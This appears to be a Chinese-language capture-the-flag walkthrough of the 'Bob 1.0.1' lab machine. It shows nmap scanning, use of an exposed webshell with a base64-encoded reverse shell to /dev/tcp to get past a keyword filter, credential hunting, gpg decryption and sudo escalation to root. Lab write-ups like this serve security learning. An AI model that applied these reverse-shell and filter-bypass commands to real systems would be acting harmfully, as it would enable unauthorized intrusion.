🖳 主机发现
sudo netdiscover -r 192.168.234.0/24
目标机器是:192.168.234.47
👁 服务扫描
nmap常规扫描端口
└─$ sudo nmap -p- -sV 192.168.234.47 --min-rate 10000Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-04 15:13 CSTNmap scan report for bogon (192.168.234.47)Host is up (0.000077s latency).Not shown: 65533 closed tcp ports (reset)PORT STATE SERVICE VERSION80/tcp open http Apache httpd 2.4.25 ((Debian))25468/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u2 (protocol 2.0)MAC Address: 08:00:27:C0:CC:74 (Oracle VirtualBox virtual NIC)Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 7.69 seconds
查看web页面,发现只是一个静态页面,查看源码也没有什么其他信息,然后在robots.txt中找到了一些信息
一个个访问,发现dev_shell是一个简单的webshell,可以远程执行我们的命令,但是过滤了一些关键字,可以试试base64绕过
┌──(rightevil㉿kali)-[~/Desktop]└─$ echo "/bin/bash -i >& /dev/tcp/192.168.234.130/1234 0>&1" | base64 L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMjM0LjEzMC8xMjM0IDA+JjEK ┌──(rightevil㉿kali)-[~/Desktop]└─$ echo "L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMjM0LjEzMC8xMjM0IDA+JjEK" | base64 -d | bash
将第二条命令复制去webshell执行,同时在本地启动监听
🚪🚶 获取权限
成功反弹到一个shell,我们可以用python尝试一下扩展一个交互性高一些的shell(如果有python的话)
通过查找,我们找到了一个密码文件以及一个gpg加密的文件
在Secret目录下,有一个可以运行的脚本,我们可以用他的首字母来组成一个密码
(根据之前web的一个页面来看)
但是我们无法用www-data去解密这个文件,我们用ssh登上其他用户,然后去解密
seb@Milburg-High:/home/bob/Documents$ gpg -d login.txt.gpg
🛡️ 提升权限
然后我们登上bob
seb@Milburg-High:/home/bob/Documents$ su bobPassword: bob@Milburg-High:~/Documents$ sudo -lsudo: unable to resolve host Milburg-High[sudo] password for bob: Matching Defaults entries for bob on Milburg-High: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser bob may run the following commands on Milburg-High: (ALL : ALL) ALLbob@Milburg-High:~/Documents$ iduid=1001(bob) gid=1001(bob) groups=1001(bob),27(sudo)
发现有很大的sudo权限,我们直接用sudo提权
bob@Milburg-High:~/Documents$ sudo bashsudo: unable to resolve host Milburg-Highroot@Milburg-High:/home/bob/Documents# whoamirootroot@Milburg-High:/home/bob/Documents# iduid=0(root) gid=0(root) groups=0(root)root@Milburg-High:/home/bob/Documents# cd /root@Milburg-High:/# cat flag.txt CONGRATS ON GAINING ROOT .-. ( ) |~| _.--._ |~|~:'--~' | | | : #root | | | : _.--._| |~|~`'--~' | | | | | | | | | | | | | | | | | | _____|_|_________ Thanks for playing ~c0rruptedb1troot@Milburg-High:/#
📖 推荐文章
Bob 1.0.1下载
个人博客:rightevil.github.io